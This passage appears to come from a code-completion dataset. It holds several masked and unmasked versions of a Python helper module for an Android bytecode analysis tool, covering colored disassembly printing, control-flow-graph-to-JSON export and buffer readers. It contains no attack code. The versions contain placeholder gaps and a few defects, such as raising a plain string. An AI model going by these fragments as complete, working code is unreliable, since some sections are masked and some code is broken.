44:\n values = DVMBasicMethodBlock.get_special_ins(ins_idx)\n cblock['info_next'] = values.get_values()\n ins_idx += DVMBasicMethodBlockInstruction.get_length()\n last_instru = DVMBasicMethodBlockInstruction\n cblock['info_bb'] = 0\n if DVMBasicMethodBlock.childs:\n if len(DVMBasicMethodBlock.childs) > 1:\n cblock['info_bb'] = 1\n if last_instru.get_op_value() == 43 or last_instru.get_op_value(\n ) == 44:\n cblock['info_bb'] = 2\n cblock['Edge'] = []\n for DVMBasicMethodBlockChild in DVMBasicMethodBlock.childs:\n ok = False\n if DVMBasicMethodBlock.get_name() in hooks:\n if DVMBasicMethodBlockChild[-1] in hooks[DVMBasicMethodBlock\n .get_name()]:\n ok = True\n cblock['Edge'].append(hooks[DVMBasicMethodBlock.\n get_name()][0].get_name())\n if not ok:\n cblock['Edge'].append(DVMBasicMethodBlockChild[-1].get_name())\n exception_analysis = DVMBasicMethodBlock.get_exception_analysis()\n if exception_analysis:\n cblock['Exceptions'] = exception_analysis.get()\n reports.append(cblock)\n reports.extend(l)\n return json.dumps(d)\n\n\nclass SV(object):\n\n def __init__(self, size, buff):\n self.__size = size\n self.__value = unpack(self.__size, buff)[0]\n\n def _get(self):\n return pack(self.__size, self.__value)\n\n def __str__(self):\n return '0x%x' % self.__value\n\n def __int__(self):\n return self.__value\n\n def get_value_buff(self):\n return self._get()\n\n def get_value(self):\n return self.__value\n\n def set_value(self, attr):\n self.__value = attr\n\n\nclass SVs(object):\n\n def __init__(self, size, ntuple, buff):\n self.__size = size\n self.__value = ntuple._make(unpack(self.__size, buff))\n\n def _get(self):\n l = []\n for i in self.__value._fields:\n l.append(getattr(self.__value, i))\n return pack(self.__size, *l)\n\n def _export(self):\n return [x for x in self.__value._fields]\n\n def get_value_buff(self):\n return self._get()\n\n def get_value(self):\n return self.__value\n\n def set_value(self, attr):\n self.__value = self.__value._replace(**attr)\n\n def __str__(self):\n return self.__value.__str__()\n\n\n<mask token>\n\n\nclass MethodBC(object):\n\n def show(self, value):\n getattr(self, 'show_' + value)()\n\n\nclass BuffHandle(object):\n\n def __init__(self, buff):\n self.__buff = bytearray(buff)\n self.__idx = 0\n\n def size(self):\n return len(self.__buff)\n\n def set_idx(self, idx):\n self.__idx = idx\n\n def get_idx(self):\n return self.__idx\n\n def readNullString(self, size):\n data = self.read(size)\n return data\n\n def read_b(self, size):\n return self.__buff[self.__idx:self.__idx + size]\n\n def read_at(self, offset, size):\n return self.__buff[offset:offset + size]\n\n def read(self, size):\n if isinstance(size, SV):\n size = size.value\n buff = self.__buff[self.__idx:self.__idx + size]\n self.__idx += size\n return buff\n\n def end(self):\n return self.__idx == len(self.__buff)\n\n\nclass Buff(object):\n\n def __init__(self, offset, buff):\n self.offset = offset\n self.buff = buff\n self.size = len(buff)\n\n\nclass _Bytecode(object):\n\n def __init__(self, buff):\n self.__buff = bytearray(buff)\n self.__idx = 0\n\n def read(self, size):\n if isinstance(size, SV):\n size = size.value\n buff = self.__buff[self.__idx:self.__idx + size]\n self.__idx += size\n return buff\n\n def readat(self, off):\n if isinstance(off, SV):\n off = off.value\n return self.__buff[off:]\n\n def read_b(self, size):\n return self.__buff[self.__idx:self.__idx + size]\n\n def set_idx(self, idx):\n self.__idx = idx\n\n def get_idx(self):\n return self.__idx\n\n def add_idx(self, idx):\n self.__idx += idx\n\n def register(self, type_register, fct):\n self.__registers[type_register].append(fct)\n\n def get_buff(self):\n return self.__buff\n\n def length_buff(self):\n return len(self.__buff)\n\n def set_buff(self, buff):\n self.__buff = buff\n\n def save(self, filename):\n buff = self._save()\n with open(filename, 'wb') as fd:\n fd.write(buff)\n\n\ndef FormatClassToJava(input):\n \"\"\"\n Transoform a typical xml format class into java format\n\n :param input: the input class name\n :rtype: string\n \"\"\"\n return 'L' + input.replace('.', '/') + ';'\n\n\ndef FormatClassToPython(input):\n i = input[:-1]\n i = i.replace('/', '_')\n i = i.replace('$', '_')\n return i\n\n\ndef FormatNameToPython(input):\n i = input.replace('<', '')\n i = i.replace('>', '')\n i = i.replace('$', '_')\n return i\n\n\ndef FormatDescriptorToPython(input):\n i = input.replace('/', '_')\n i = i.replace(';', '')\n i = i.replace('[', '')\n i = i.replace('(', '')\n i = i.replace(')', '')\n i = i.replace(' ', '')\n i = i.replace('$', '')\n return i\n\n\nclass Node(object):\n\n def __init__(self, n, s):\n self.id = n\n self.title = s\n self.children = []\n",
"step-3": "<mask token>\n\n\ndef disable_print_colors():\n colors = save_colors()\n remove_colors()\n return colors\n\n\ndef enable_print_colors(colors):\n enable_colors(colors)\n\n\n<mask token>\n\n\ndef Warning(msg):\n warning(msg)\n\n\ndef _PrintBanner():\n print_fct = CONF['PRINT_FCT']\n print_fct('*' * 75 + '\\n')\n\n\n<mask token>\n\n\ndef _PrintNote(note, tab=0):\n print_fct = CONF['PRINT_FCT']\n note_color = CONF['COLORS']['NOTE']\n normal_color = CONF['COLORS']['NORMAL']\n print_fct('\\t' * tab + '%s# %s%s' % (note_color, note, normal_color) + '\\n'\n )\n\n\n<mask token>\n\n\ndef _PrintXRef(tag, items):\n print_fct = CONF['PRINT_FCT']\n for i in items:\n print_fct('%s: %s %s %s %s\\n' % (tag, i[0].get_class_name(), i[0].\n get_name(), i[0].get_descriptor(), ' '.join('%x' % j.get_idx() for\n j in i[1])))\n\n\n<mask token>\n\n\ndef _PrintDefault(msg):\n print_fct = CONF['PRINT_FCT']\n print_fct(msg)\n\n\ndef PrettyShow(m_a, basic_blocks, notes={}):\n idx = 0\n nb = 0\n offset_color = CONF['COLORS']['OFFSET']\n offset_addr_color = CONF['COLORS']['OFFSET_ADDR']\n instruction_name_color = CONF['COLORS']['INSTRUCTION_NAME']\n branch_false_color = CONF['COLORS']['BRANCH_FALSE']\n branch_true_color = CONF['COLORS']['BRANCH_TRUE']\n branch_color = CONF['COLORS']['BRANCH']\n exception_color = CONF['COLORS']['EXCEPTION']\n bb_color = CONF['COLORS']['BB']\n normal_color = CONF['COLORS']['NORMAL']\n print_fct = CONF['PRINT_FCT']\n colors = CONF['COLORS']['OUTPUT']\n for i in basic_blocks:\n print_fct('%s%s%s : \\n' % (bb_color, i.get_name(), normal_color))\n instructions = i.get_instructions()\n for ins in instructions:\n if nb in notes:\n for note in notes[nb]:\n _PrintNote(note, 1)\n print_fct('\\t%s%-3d%s(%s%08x%s) ' % (offset_color, nb,\n normal_color, offset_addr_color, idx, normal_color))\n print_fct('%s%-20s%s' % (instruction_name_color, ins.get_name(),\n normal_color))\n operands = ins.get_operands()\n print_fct('%s' % ', '.join(m_a.get_vm().colorize_operands(\n operands, colors)))\n op_value = ins.get_op_value()\n if ins == instructions[-1] and i.childs:\n print_fct(' ')\n if (op_value == 43 or op_value == 44) and len(i.childs) > 1:\n values = i.get_special_ins(idx).get_values()\n print_fct('%s[ D:%s%s ' % (branch_false_color, i.childs\n [0][2].get_name(), branch_color))\n print_fct(' '.join('%d:%s' % (values[j], i.childs[j + 1\n ][2].get_name()) for j in range(0, len(i.childs) - \n 1)) + ' ]%s' % normal_color)\n elif len(i.childs) == 2:\n print_fct('%s[ %s%s ' % (branch_false_color, i.childs[0\n ][2].get_name(), branch_true_color))\n print_fct(' '.join('%s' % c[2].get_name() for c in i.\n childs[1:]) + ' ]%s' % normal_color)\n else:\n print_fct('%s[ ' % branch_color + ' '.join('%s' % c[2].\n get_name() for c in i.childs) + ' ]%s' % normal_color)\n idx += ins.get_length()\n nb += 1\n print_fct('\\n')\n if i.get_exception_analysis():\n print_fct('\\t%s%s%s\\n' % (exception_color, i.exception_analysis\n .show_buff(), normal_color))\n print_fct('\\n')\n\n\nclass TmpBlock(object):\n\n def __init__(self, name):\n self.name = name\n\n def get_name(self):\n return self.name\n\n\ndef method2json(mx, directed_graph=False):\n if directed_graph:\n return method2json_direct(mx)\n return method2json_undirect(mx)\n\n\ndef method2json_undirect(mx):\n d = {}\n reports = []\n d['reports'] = reports\n for DVMBasicMethodBlock in mx.basic_blocks.gets():\n cblock = {}\n cblock['BasicBlockId'] = DVMBasicMethodBlock.get_name()\n cblock['registers'] = mx.get_method().get_code().get_registers_size()\n cblock['instructions'] = []\n ins_idx = DVMBasicMethodBlock.start\n for DVMBasicMethodBlockInstruction in DVMBasicMethodBlock.get_instructions(\n ):\n c_ins = {}\n c_ins['idx'] = ins_idx\n c_ins['name'] = DVMBasicMethodBlockInstruction.get_name()\n c_ins['operands'] = DVMBasicMethodBlockInstruction.get_operands(\n ins_idx)\n cblock['instructions'].append(c_ins)\n ins_idx += DVMBasicMethodBlockInstruction.get_length()\n cblock['Edge'] = []\n for DVMBasicMethodBlockChild in DVMBasicMethodBlock.childs:\n cblock['Edge'].append(DVMBasicMethodBlockChild[-1].get_name())\n reports.append(cblock)\n return json.dumps(d)\n\n\ndef method2json_direct(mx):\n d = {}\n reports = []\n d['reports'] = reports\n hooks = {}\n l = []\n for DVMBasicMethodBlock in mx.basic_blocks.gets():\n for index, DVMBasicMethodBlockChild in enumerate(DVMBasicMethodBlock\n .childs):\n if DVMBasicMethodBlock.get_name() == DVMBasicMethodBlockChild[-1\n ].get_name():\n preblock = TmpBlock(DVMBasicMethodBlock.get_name() + '-pre')\n cnblock = {}\n cnblock['BasicBlockId'] = DVMBasicMethodBlock.get_name(\n ) + '-pre'\n cnblock['start'] = DVMBasicMethodBlock.start\n cnblock['notes'] = []\n cnblock['Edge'] = [DVMBasicMethodBlock.get_name()]\n cnblock['registers'] = 0\n cnblock['instructions'] = []\n cnblock['info_bb'] = 0\n l.append(cnblock)\n for parent in DVMBasicMethodBlock.fathers:\n hooks[parent[-1].get_name()] = []\n hooks[parent[-1].get_name()].append(preblock)\n for idx, child in enumerate(parent[-1].childs):\n if child[-1].get_name(\n ) == DVMBasicMethodBlock.get_name():\n hooks[parent[-1].get_name()].append(child[-1])\n for DVMBasicMethodBlock in mx.basic_blocks.gets():\n cblock = {}\n cblock['BasicBlockId'] = DVMBasicMethodBlock.get_name()\n cblock['start'] = DVMBasicMethodBlock.start\n cblock['notes'] = DVMBasicMethodBlock.get_notes()\n cblock['registers'] = mx.get_method().get_code().get_registers_size()\n cblock['instructions'] = []\n ins_idx = DVMBasicMethodBlock.start\n last_instru = None\n for DVMBasicMethodBlockInstruction in DVMBasicMethodBlock.get_instructions(\n ):\n c_ins = {}\n c_ins['idx'] = ins_idx\n c_ins['name'] = DVMBasicMethodBlockInstruction.get_name()\n c_ins['operands'] = DVMBasicMethodBlockInstruction.get_operands(\n ins_idx)\n c_ins['formatted_operands'\n ] = DVMBasicMethodBlockInstruction.get_formatted_operands()\n cblock['instructions'].append(c_ins)\n if DVMBasicMethodBlockInstruction.get_op_value(\n ) == 43 or DVMBasicMethodBlockInstruction.get_op_value() == 44:\n values = DVMBasicMethodBlock.get_special_ins(ins_idx)\n cblock['info_next'] = values.get_values()\n ins_idx += DVMBasicMethodBlockInstruction.get_length()\n last_instru = DVMBasicMethodBlockInstruction\n cblock['info_bb'] = 0\n if DVMBasicMethodBlock.childs:\n if len(DVMBasicMethodBlock.childs) > 1:\n cblock['info_bb'] = 1\n if last_instru.get_op_value() == 43 or last_instru.get_op_value(\n ) == 44:\n cblock['info_bb'] = 2\n cblock['Edge'] = []\n for DVMBasicMethodBlockChild in DVMBasicMethodBlock.childs:\n ok = False\n if DVMBasicMethodBlock.get_name() in hooks:\n if DVMBasicMethodBlockChild[-1] in hooks[DVMBasicMethodBlock\n .get_name()]:\n ok = True\n cblock['Edge'].append(hooks[DVMBasicMethodBlock.\n get_name()][0].get_name())\n if not ok:\n cblock['Edge'].append(DVMBasicMethodBlockChild[-1].get_name())\n exception_analysis = DVMBasicMethodBlock.get_exception_analysis()\n if exception_analysis:\n cblock['Exceptions'] = exception_analysis.get()\n reports.append(cblock)\n reports.extend(l)\n return json.dumps(d)\n\n\nclass SV(object):\n\n def __init__(self, size, buff):\n self.__size = size\n self.__value = unpack(self.__size, buff)[0]\n\n def _get(self):\n return pack(self.__size, self.__value)\n\n def __str__(self):\n return '0x%x' % self.__value\n\n def __int__(self):\n return self.__value\n\n def get_value_buff(self):\n return self._get()\n\n def get_value(self):\n return self.__value\n\n def set_value(self, attr):\n self.__value = attr\n\n\nclass SVs(object):\n\n def __init__(self, size, ntuple, buff):\n self.__size = size\n self.__value = ntuple._make(unpack(self.__size, buff))\n\n def _get(self):\n l = []\n for i in self.__value._fields:\n l.append(getattr(self.__value, i))\n return pack(self.__size, *l)\n\n def _export(self):\n return [x for x in self.__value._fields]\n\n def get_value_buff(self):\n return self._get()\n\n def get_value(self):\n return self.__value\n\n def set_value(self, attr):\n self.__value = self.__value._replace(**attr)\n\n def __str__(self):\n return self.__value.__str__()\n\n\n<mask token>\n\n\nclass MethodBC(object):\n\n def show(self, value):\n getattr(self, 'show_' + value)()\n\n\nclass BuffHandle(object):\n\n def __init__(self, buff):\n self.__buff = bytearray(buff)\n self.__idx = 0\n\n def size(self):\n return len(self.__buff)\n\n def set_idx(self, idx):\n self.__idx = idx\n\n def get_idx(self):\n return self.__idx\n\n def readNullString(self, size):\n data = self.read(size)\n return data\n\n def read_b(self, size):\n return self.__buff[self.__idx:self.__idx + size]\n\n def read_at(self, offset, size):\n return self.__buff[offset:offset + size]\n\n def read(self, size):\n if isinstance(size, SV):\n size = size.value\n buff = self.__buff[self.__idx:self.__idx + size]\n self.__idx += size\n return buff\n\n def end(self):\n return self.__idx == len(self.__buff)\n\n\nclass Buff(object):\n\n def __init__(self, offset, buff):\n self.offset = offset\n self.buff = buff\n self.size = len(buff)\n\n\nclass _Bytecode(object):\n\n def __init__(self, buff):\n self.__buff = bytearray(buff)\n self.__idx = 0\n\n def read(self, size):\n if isinstance(size, SV):\n size = size.value\n buff = self.__buff[self.__idx:self.__idx + size]\n self.__idx += size\n return buff\n\n def readat(self, off):\n if isinstance(off, SV):\n off = off.value\n return self.__buff[off:]\n\n def read_b(self, size):\n return self.__buff[self.__idx:self.__idx + size]\n\n def set_idx(self, idx):\n self.__idx = idx\n\n def get_idx(self):\n return self.__idx\n\n def add_idx(self, idx):\n self.__idx += idx\n\n def register(self, type_register, fct):\n self.__registers[type_register].append(fct)\n\n def get_buff(self):\n return self.__buff\n\n def length_buff(self):\n return len(self.__buff)\n\n def set_buff(self, buff):\n self.__buff = buff\n\n def save(self, filename):\n buff = self._save()\n with open(filename, 'wb') as fd:\n fd.write(buff)\n\n\ndef FormatClassToJava(input):\n \"\"\"\n Transoform a typical xml format class into java format\n\n :param input: the input class name\n :rtype: string\n \"\"\"\n return 'L' + input.replace('.', '/') + ';'\n\n\ndef FormatClassToPython(input):\n i = input[:-1]\n i = i.replace('/', '_')\n i = i.replace('$', '_')\n return i\n\n\ndef FormatNameToPython(input):\n i = input.replace('<', '')\n i = i.replace('>', '')\n i = i.replace('$', '_')\n return i\n\n\ndef FormatDescriptorToPython(input):\n i = input.replace('/', '_')\n i = i.replace(';', '')\n i = i.replace('[', '')\n i = i.replace('(', '')\n i = i.replace(')', '')\n i = i.replace(' ', '')\n i = i.replace('$', '')\n return i\n\n\nclass Node(object):\n\n def __init__(self, n, s):\n self.id = n\n self.title = s\n self.children = []\n",
"step-4": "<mask token>\n\n\ndef disable_print_colors():\n colors = save_colors()\n remove_colors()\n return colors\n\n\ndef enable_print_colors(colors):\n enable_colors(colors)\n\n\n<mask token>\n\n\ndef Warning(msg):\n warning(msg)\n\n\ndef _PrintBanner():\n print_fct = CONF['PRINT_FCT']\n print_fct('*' * 75 + '\\n')\n\n\ndef _PrintSubBanner(title=None):\n print_fct = CONF['PRINT_FCT']\n if title == None:\n print_fct('#' * 20 + '\\n')\n else:\n print_fct('#' * 10 + ' ' + title + '\\n')\n\n\ndef _PrintNote(note, tab=0):\n print_fct = CONF['PRINT_FCT']\n note_color = CONF['COLORS']['NOTE']\n normal_color = CONF['COLORS']['NORMAL']\n print_fct('\\t' * tab + '%s# %s%s' % (note_color, note, normal_color) + '\\n'\n )\n\n\n<mask token>\n\n\ndef _PrintXRef(tag, items):\n print_fct = CONF['PRINT_FCT']\n for i in items:\n print_fct('%s: %s %s %s %s\\n' % (tag, i[0].get_class_name(), i[0].\n get_name(), i[0].get_descriptor(), ' '.join('%x' % j.get_idx() for\n j in i[1])))\n\n\n<mask token>\n\n\ndef _PrintDefault(msg):\n print_fct = CONF['PRINT_FCT']\n print_fct(msg)\n\n\ndef PrettyShow(m_a, basic_blocks, notes={}):\n idx = 0\n nb = 0\n offset_color = CONF['COLORS']['OFFSET']\n offset_addr_color = CONF['COLORS']['OFFSET_ADDR']\n instruction_name_color = CONF['COLORS']['INSTRUCTION_NAME']\n branch_false_color = CONF['COLORS']['BRANCH_FALSE']\n branch_true_color = CONF['COLORS']['BRANCH_TRUE']\n branch_color = CONF['COLORS']['BRANCH']\n exception_color = CONF['COLORS']['EXCEPTION']\n bb_color = CONF['COLORS']['BB']\n normal_color = CONF['COLORS']['NORMAL']\n print_fct = CONF['PRINT_FCT']\n colors = CONF['COLORS']['OUTPUT']\n for i in basic_blocks:\n print_fct('%s%s%s : \\n' % (bb_color, i.get_name(), normal_color))\n instructions = i.get_instructions()\n for ins in instructions:\n if nb in notes:\n for note in notes[nb]:\n _PrintNote(note, 1)\n print_fct('\\t%s%-3d%s(%s%08x%s) ' % (offset_color, nb,\n normal_color, offset_addr_color, idx, normal_color))\n print_fct('%s%-20s%s' % (instruction_name_color, ins.get_name(),\n normal_color))\n operands = ins.get_operands()\n print_fct('%s' % ', '.join(m_a.get_vm().colorize_operands(\n operands, colors)))\n op_value = ins.get_op_value()\n if ins == instructions[-1] and i.childs:\n print_fct(' ')\n if (op_value == 43 or op_value == 44) and len(i.childs) > 1:\n values = i.get_special_ins(idx).get_values()\n print_fct('%s[ D:%s%s ' % (branch_false_color, i.childs\n [0][2].get_name(), branch_color))\n print_fct(' '.join('%d:%s' % (values[j], i.childs[j + 1\n ][2].get_name()) for j in range(0, len(i.childs) - \n 1)) + ' ]%s' % normal_color)\n elif len(i.childs) == 2:\n print_fct('%s[ %s%s ' % (branch_false_color, i.childs[0\n ][2].get_name(), branch_true_color))\n print_fct(' '.join('%s' % c[2].get_name() for c in i.\n childs[1:]) + ' ]%s' % normal_color)\n else:\n print_fct('%s[ ' % branch_color + ' '.join('%s' % c[2].\n get_name() for c in i.childs) + ' ]%s' % normal_color)\n idx += ins.get_length()\n nb += 1\n print_fct('\\n')\n if i.get_exception_analysis():\n print_fct('\\t%s%s%s\\n' % (exception_color, i.exception_analysis\n .show_buff(), normal_color))\n print_fct('\\n')\n\n\nclass TmpBlock(object):\n\n def __init__(self, name):\n self.name = name\n\n def get_name(self):\n return self.name\n\n\ndef method2json(mx, directed_graph=False):\n if directed_graph:\n return method2json_direct(mx)\n return method2json_undirect(mx)\n\n\ndef method2json_undirect(mx):\n d = {}\n reports = []\n d['reports'] = reports\n for DVMBasicMethodBlock in mx.basic_blocks.gets():\n cblock = {}\n cblock['BasicBlockId'] = DVMBasicMethodBlock.get_name()\n cblock['registers'] = mx.get_method().get_code().get_registers_size()\n cblock['instructions'] = []\n ins_idx = DVMBasicMethodBlock.start\n for DVMBasicMethodBlockInstruction in DVMBasicMethodBlock.get_instructions(\n ):\n c_ins = {}\n c_ins['idx'] = ins_idx\n c_ins['name'] = DVMBasicMethodBlockInstruction.get_name()\n c_ins['operands'] = DVMBasicMethodBlockInstruction.get_operands(\n ins_idx)\n cblock['instructions'].append(c_ins)\n ins_idx += DVMBasicMethodBlockInstruction.get_length()\n cblock['Edge'] = []\n for DVMBasicMethodBlockChild in DVMBasicMethodBlock.childs:\n cblock['Edge'].append(DVMBasicMethodBlockChild[-1].get_name())\n reports.append(cblock)\n return json.dumps(d)\n\n\ndef method2json_direct(mx):\n d = {}\n reports = []\n d['reports'] = reports\n hooks = {}\n l = []\n for DVMBasicMethodBlock in mx.basic_blocks.gets():\n for index, DVMBasicMethodBlockChild in enumerate(DVMBasicMethodBlock\n .childs):\n if DVMBasicMethodBlock.get_name() == DVMBasicMethodBlockChild[-1\n ].get_name():\n preblock = TmpBlock(DVMBasicMethodBlock.get_name() + '-pre')\n cnblock = {}\n cnblock['BasicBlockId'] = DVMBasicMethodBlock.get_name(\n ) + '-pre'\n cnblock['start'] = DVMBasicMethodBlock.start\n cnblock['notes'] = []\n cnblock['Edge'] = [DVMBasicMethodBlock.get_name()]\n cnblock['registers'] = 0\n cnblock['instructions'] = []\n cnblock['info_bb'] = 0\n l.append(cnblock)\n for parent in DVMBasicMethodBlock.fathers:\n hooks[parent[-1].get_name()] = []\n hooks[parent[-1].get_name()].append(preblock)\n for idx, child in enumerate(parent[-1].childs):\n if child[-1].get_name(\n ) == DVMBasicMethodBlock.get_name():\n hooks[parent[-1].get_name()].append(child[-1])\n for DVMBasicMethodBlock in mx.basic_blocks.gets():\n cblock = {}\n cblock['BasicBlockId'] = DVMBasicMethodBlock.get_name()\n cblock['start'] = DVMBasicMethodBlock.start\n cblock['notes'] = DVMBasicMethodBlock.get_notes()\n cblock['registers'] = mx.get_method().get_code().get_registers_size()\n cblock['instructions'] = []\n ins_idx = DVMBasicMethodBlock.start\n last_instru = None\n for DVMBasicMethodBlockInstruction in DVMBasicMethodBlock.get_instructions(\n ):\n c_ins = {}\n c_ins['idx'] = ins_idx\n c_ins['name'] = DVMBasicMethodBlockInstruction.get_name()\n c_ins['operands'] = DVMBasicMethodBlockInstruction.get_operands(\n ins_idx)\n c_ins['formatted_operands'\n ] = DVMBasicMethodBlockInstruction.get_formatted_operands()\n cblock['instructions'].append(c_ins)\n if DVMBasicMethodBlockInstruction.get_op_value(\n ) == 43 or DVMBasicMethodBlockInstruction.get_op_value() == 44:\n values = DVMBasicMethodBlock.get_special_ins(ins_idx)\n cblock['info_next'] = values.get_values()\n ins_idx += DVMBasicMethodBlockInstruction.get_length()\n last_instru = DVMBasicMethodBlockInstruction\n cblock['info_bb'] = 0\n if DVMBasicMethodBlock.childs:\n if len(DVMBasicMethodBlock.childs) > 1:\n cblock['info_bb'] = 1\n if last_instru.get_op_value() == 43 or last_instru.get_op_value(\n ) == 44:\n cblock['info_bb'] = 2\n cblock['Edge'] = []\n for DVMBasicMethodBlockChild in DVMBasicMethodBlock.childs:\n ok = False\n if DVMBasicMethodBlock.get_name() in hooks:\n if DVMBasicMethodBlockChild[-1] in hooks[DVMBasicMethodBlock\n .get_name()]:\n ok = True\n cblock['Edge'].append(hooks[DVMBasicMethodBlock.\n get_name()][0].get_name())\n if not ok:\n cblock['Edge'].append(DVMBasicMethodBlockChild[-1].get_name())\n exception_analysis = DVMBasicMethodBlock.get_exception_analysis()\n if exception_analysis:\n cblock['Exceptions'] = exception_analysis.get()\n reports.append(cblock)\n reports.extend(l)\n return json.dumps(d)\n\n\nclass SV(object):\n\n def __init__(self, size, buff):\n self.__size = size\n self.__value = unpack(self.__size, buff)[0]\n\n def _get(self):\n return pack(self.__size, self.__value)\n\n def __str__(self):\n return '0x%x' % self.__value\n\n def __int__(self):\n return self.__value\n\n def get_value_buff(self):\n return self._get()\n\n def get_value(self):\n return self.__value\n\n def set_value(self, attr):\n self.__value = attr\n\n\nclass SVs(object):\n\n def __init__(self, size, ntuple, buff):\n self.__size = size\n self.__value = ntuple._make(unpack(self.__size, buff))\n\n def _get(self):\n l = []\n for i in self.__value._fields:\n l.append(getattr(self.__value, i))\n return pack(self.__size, *l)\n\n def _export(self):\n return [x for x in self.__value._fields]\n\n def get_value_buff(self):\n return self._get()\n\n def get_value(self):\n return self.__value\n\n def set_value(self, attr):\n self.__value = self.__value._replace(**attr)\n\n def __str__(self):\n return self.__value.__str__()\n\n\ndef object_to_bytes(obj):\n \"\"\"\n Convert a object to a bytearray or call get_raw() of the object\n if no useful type was found.\n \"\"\"\n if isinstance(obj, str):\n return bytearray(obj, 'UTF-8')\n elif isinstance(obj, bool):\n return bytearray()\n elif isinstance(obj, int):\n return pack('<L', obj)\n elif obj == None:\n return bytearray()\n elif isinstance(obj, bytearray):\n return obj\n else:\n return obj.get_raw()\n\n\nclass MethodBC(object):\n\n def show(self, value):\n getattr(self, 'show_' + value)()\n\n\nclass BuffHandle(object):\n\n def __init__(self, buff):\n self.__buff = bytearray(buff)\n self.__idx = 0\n\n def size(self):\n return len(self.__buff)\n\n def set_idx(self, idx):\n self.__idx = idx\n\n def get_idx(self):\n return self.__idx\n\n def readNullString(self, size):\n data = self.read(size)\n return data\n\n def read_b(self, size):\n return self.__buff[self.__idx:self.__idx + size]\n\n def read_at(self, offset, size):\n return self.__buff[offset:offset + size]\n\n def read(self, size):\n if isinstance(size, SV):\n size = size.value\n buff = self.__buff[self.__idx:self.__idx + size]\n self.__idx += size\n return buff\n\n def end(self):\n return self.__idx == len(self.__buff)\n\n\nclass Buff(object):\n\n def __init__(self, offset, buff):\n self.offset = offset\n self.buff = buff\n self.size = len(buff)\n\n\nclass _Bytecode(object):\n\n def __init__(self, buff):\n self.__buff = bytearray(buff)\n self.__idx = 0\n\n def read(self, size):\n if isinstance(size, SV):\n size = size.value\n buff = self.__buff[self.__idx:self.__idx + size]\n self.__idx += size\n return buff\n\n def readat(self, off):\n if isinstance(off, SV):\n off = off.value\n return self.__buff[off:]\n\n def read_b(self, size):\n return self.__buff[self.__idx:self.__idx + size]\n\n def set_idx(self, idx):\n self.__idx = idx\n\n def get_idx(self):\n return self.__idx\n\n def add_idx(self, idx):\n self.__idx += idx\n\n def register(self, type_register, fct):\n self.__registers[type_register].append(fct)\n\n def get_buff(self):\n return self.__buff\n\n def length_buff(self):\n return len(self.__buff)\n\n def set_buff(self, buff):\n self.__buff = buff\n\n def save(self, filename):\n buff = self._save()\n with open(filename, 'wb') as fd:\n fd.write(buff)\n\n\ndef FormatClassToJava(input):\n \"\"\"\n Transoform a typical xml format class into java format\n\n :param input: the input class name\n :rtype: string\n \"\"\"\n return 'L' + input.replace('.', '/') + ';'\n\n\ndef FormatClassToPython(input):\n i = input[:-1]\n i = i.replace('/', '_')\n i = i.replace('$', '_')\n return i\n\n\ndef FormatNameToPython(input):\n i = input.replace('<', '')\n i = i.replace('>', '')\n i = i.replace('$', '_')\n return i\n\n\ndef FormatDescriptorToPython(input):\n i = input.replace('/', '_')\n i = i.replace(';', '')\n i = i.replace('[', '')\n i = i.replace('(', '')\n i = i.replace(')', '')\n i = i.replace(' ', '')\n i = i.replace('$', '')\n return i\n\n\nclass Node(object):\n\n def __init__(self, n, s):\n self.id = n\n self.title = s\n self.children = []\n",
"step-5": "from __future__ import print_function\nfrom __future__ import absolute_import\n\nfrom builtins import str\nfrom builtins import range\nfrom builtins import object\nimport hashlib\nfrom xml.sax.saxutils import escape\nfrom struct import unpack, pack\nimport textwrap\n\nimport json\nfrom .anconf import warning, error, CONF, enable_colors, remove_colors, save_colors, color_range\n\n\ndef disable_print_colors():\n colors = save_colors()\n remove_colors()\n return colors\n\n\ndef enable_print_colors(colors):\n enable_colors(colors)\n\n\n# Handle exit message\ndef Exit(msg):\n warning(\"Error : \" + msg)\n raise (\"oops\")\n\n\ndef Warning(msg):\n warning(msg)\n\n\ndef _PrintBanner():\n print_fct = CONF[\"PRINT_FCT\"]\n print_fct(\"*\" * 75 + \"\\n\")\n\n\ndef _PrintSubBanner(title=None):\n print_fct = CONF[\"PRINT_FCT\"]\n if title == None:\n print_fct(\"#\" * 20 + \"\\n\")\n else:\n print_fct(\"#\" * 10 + \" \" + title + \"\\n\")\n\n\ndef _PrintNote(note, tab=0):\n print_fct = CONF[\"PRINT_FCT\"]\n note_color = CONF[\"COLORS\"][\"NOTE\"]\n normal_color = CONF[\"COLORS\"][\"NORMAL\"]\n print_fct(\"\\t\" * tab + \"%s# %s%s\" % (note_color, note, normal_color) + \"\\n\")\n\n\n# Print arg into a correct format\ndef _Print(name, arg):\n buff = name + \" \"\n\n if type(arg).__name__ == 'int':\n buff += \"0x%x\" % arg\n elif type(arg).__name__ == 'long':\n buff += \"0x%x\" % arg\n elif type(arg).__name__ == 'str':\n buff += \"%s\" % arg\n elif isinstance(arg, SV):\n buff += \"0x%x\" % arg.get_value()\n elif isinstance(arg, SVs):\n buff += arg.get_value().__str__()\n\n print(buff)\n\n\ndef PrettyShowEx(exceptions):\n if len(exceptions) > 0:\n CONF[\"PRINT_FCT\"](\"Exceptions:\\n\")\n for i in exceptions:\n CONF[\"PRINT_FCT\"](\"\\t%s%s%s\\n\" %\n (CONF[\"COLORS\"][\"EXCEPTION\"], i.show_buff(),\n CONF[\"COLORS\"][\"NORMAL\"]))\n\n\ndef _PrintXRef(tag, items):\n print_fct = CONF[\"PRINT_FCT\"]\n for i in items:\n print_fct(\"%s: %s %s %s %s\\n\" %\n (tag, i[0].get_class_name(), i[0].get_name(),\n i[0].get_descriptor(), ' '.join(\"%x\" % j.get_idx()\n for j in i[1])))\n\n\ndef _PrintDRef(tag, items):\n print_fct = CONF[\"PRINT_FCT\"]\n for i in items:\n print_fct(\"%s: %s %s %s %s\\n\" %\n (tag, i[0].get_class_name(), i[0].get_name(),\n i[0].get_descriptor(), ' '.join(\"%x\" % j for j in i[1])))\n\n\ndef _PrintDefault(msg):\n print_fct = CONF[\"PRINT_FCT\"]\n print_fct(msg)\n\n\ndef PrettyShow(m_a, basic_blocks, notes={}):\n idx = 0\n nb = 0\n\n offset_color = CONF[\"COLORS\"][\"OFFSET\"]\n offset_addr_color = CONF[\"COLORS\"][\"OFFSET_ADDR\"]\n instruction_name_color = CONF[\"COLORS\"][\"INSTRUCTION_NAME\"]\n branch_false_color = CONF[\"COLORS\"][\"BRANCH_FALSE\"]\n branch_true_color = CONF[\"COLORS\"][\"BRANCH_TRUE\"]\n branch_color = CONF[\"COLORS\"][\"BRANCH\"]\n exception_color = CONF[\"COLORS\"][\"EXCEPTION\"]\n 